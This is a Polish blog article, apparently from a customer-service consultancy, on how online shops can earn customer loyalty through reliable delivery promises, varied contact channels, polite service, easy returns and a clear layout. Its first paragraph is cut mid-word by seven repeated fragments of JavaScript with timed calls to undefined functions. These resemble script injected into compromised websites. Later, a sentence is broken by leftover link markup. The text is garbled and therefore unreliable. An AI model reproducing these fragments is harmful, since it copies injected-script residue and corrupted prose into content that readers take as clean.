Czy można zdobyć lojalność klienta e-sklepu? – Firma Przyjazna Klientowi

Czy można zdobyć lojalność klienta e-sklepu?

Czy mozna zdobyc lojalnosc klienta e-sklepu

Branża e-commerce rozwija się coraz prężniej, a właściciele sklepów stacjonarnych chętnie przenoszą swoją działalność do Internetu. Pozwala to na zminimalizowanie kosztów, a co za tym idzie możliwość proponowania konkurencyjnych cen. Większość konsumentów jest świadoma tego faktu i coraz chętniej robi zakupy, korzystając z e-sklepów. Dla klientów jest to przede wszystkim wygodne. Przeglądanie asortymentu sklepu w domowym zaciszu jest dla wielu po prostu bardziej komfortowe niż spędzanie czasu w centrum handom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andlowym. Dodatkowo wiele sklepów oferuje ciekawe promocje, darmowe dostawy, rabaty, kupony i konkursy. Czy to wpływa na lojalność klienta e-sklepu? Co zrobić, aby konsument robił zakupy wielokrotnie w naszym sklepie i tym samym stał się stałym klientem?

Czynniki utrudniające pozyskiwanie lojalności klienta w e-sklepie

Pozyskanie lojalności klienta sklepu internetowego może być trudne, a dwa główne czynniki wpływające na ten fakt to duża konkurencja na rynku oraz pewna anonimowość klienta. Trudno tu wywrzeć na kimś dobre wrażenie, co byłoby znacznie łatwiejsze w bezpośrednim kontakcie. W przypadku sklepów stacjonarnych na naszą korzyść wpływałaby sama lokalizacja – klienci mieszkający w pobliżu chętnej powracaliby do naszego sklepu, gdyby mieszkali w pobliżu. Sklep internetowy nie daje nam tej przewagi.

Aktualne informacje na stronie

Co można zrobić, żeby zdobyć lojalność klienta e-sklepu? Przede wszystkim należy być słownym. Zadbajmy o to, by na stronie internetowej zawsze umieszczone były aktualne informacje. Jeśli obiecujesz wysyłkę w 24 godziny, dołóż wszelkich starań, by zakupiony przez klienta towar opuścił magazyn w tym terminie. To szczególnie istotne – czas oczekiwania na przesyłkę jest jednym z kluczowych czynników wpływających na podjęcie przez klientów decyzji o zakupie (lub nie) w sklepie internetowym.

Wielokanałowa możliwość kontaktu

Kolejną bardzo istotną kwestią jest kontakt z klientem. Informacje kontaktowe powinny być czytelne i widoczne na stronie. Warto też urozmaicić formy kontaktu. Koniecznością jest podanie numeru telefonu. Z różnych badań wynika jednak, że klienci preferują kontakt pisemny – oprócz tradycyjnego adresu e-mail, warto pomyśleć również nad zainstalowaniem coraz popularniejszego live chatu.

Obsługa klienta

Obsługa klienta to czynnik kluczowy – musi być w pełni profesjonalna. Zespół, który pracuje w e-sklepie, powinien zostać odpowiednio przeszkolony. Komunikacja z klientem powinna być cierpliwa i uprzejma. Czasami warto wyjść z inicjatywą i np. zmienić sposób kontaktu z klientem z mailowego na telefoniczny, by szybciej rozwiązać problem. Jak wiadomo w dobie internetu nietrudno o negatywną opinię, która może dotrzeć do wielu użytkowników i skutecznie odstraszyć potencjalnych klientów naszego sklepu.

Prosta procedura reklamacji

Dobrą praktyką jest posiadanie jasnego regulaminu zwrotu towarów. To powoduje, że klient jest bardziej ufny i chętniej kupuje, bo wie, że gdy np. zamówione buty nie będą pasować to może je zwrócić bez konsekwencji. Zakupy przebiegają wtedy bezstresowo.

Przejrzysta strona internetowa

towi.pl/portfolio-badan/”>Zadowolenie klienta wzrośnie, jeśli struktura strony będzie przejrzysta, a sam proces zakupowy – intuicyjny. Jeśli sklep ma atrakcyjny i nowoczesny layout, budzi większe zainteresowanie klienta.

Pozyskanie lojalności klienta w przypadku sklepu internetowego jest trudniejsze niż w przypadku działalności prowadzonej bezpośrednio, ale nie jest niemożliwe. Wystarczy wypracować kilak zasad, które usprawnią obsługę klienta. Warto też poszukać sposobu, który wyróżni nasz sklep na tle konkurencji.